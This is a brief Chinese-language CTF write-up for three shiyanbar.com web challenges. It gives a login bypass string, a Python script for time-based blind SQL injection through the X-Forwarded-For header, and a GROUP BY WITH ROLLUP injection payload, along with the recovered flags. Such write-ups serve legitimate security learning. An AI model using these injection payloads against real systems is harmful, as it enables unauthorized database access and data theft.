实验吧ctf

1/登陆一下好吗??

http://ctf5.shiyanbar.com/web/wonderkun/web/index.html
 ='
 ='
 ctf{51d1bf8fb65a8c2406513ee8f52283e7}

2/who are you ?
http://ctf5.shiyanbar.com/web/wonderkun/index.php

 import requests
import time
payloads='abcdefghijklmnopqrstuvwxyz0123456789@_.{}-'
flag = ''
def exp(x,i):
    starttime=time.time()
    url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
    xxx = "' or sleep(ascii(mid((select(flag)from(flag))from("+str(x)+")for(1)))=ascii('"+i+"')) and '1'='1"
    headers = {
    "Host": "ctf5.shiyanbar.com",
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding": "gzip, deflate",
    "Connection": "keep-alive",
    "X-FORWARDED-FOR": xxx
    }
    res = requests.get(url, headers=headers)
    s = time.time() - starttime;
    if s > 1:
        return 1
    else:
        return 0
for x in range(1,33):
    for i in payloads:
        if (exp(x,i)):
            flag+=i
            print flag
            break
        else: 
            pass
print 'flag:'+flag

 ctf{cdbf14c9551d5be5612f7bb5d2867853}

3/因缺思汀的绕过

 http://ctf5.shiyanbar.com/web/pcat/index.php
 uname=d%27or 1=1 group by pwd with rollup limit 1 offset 2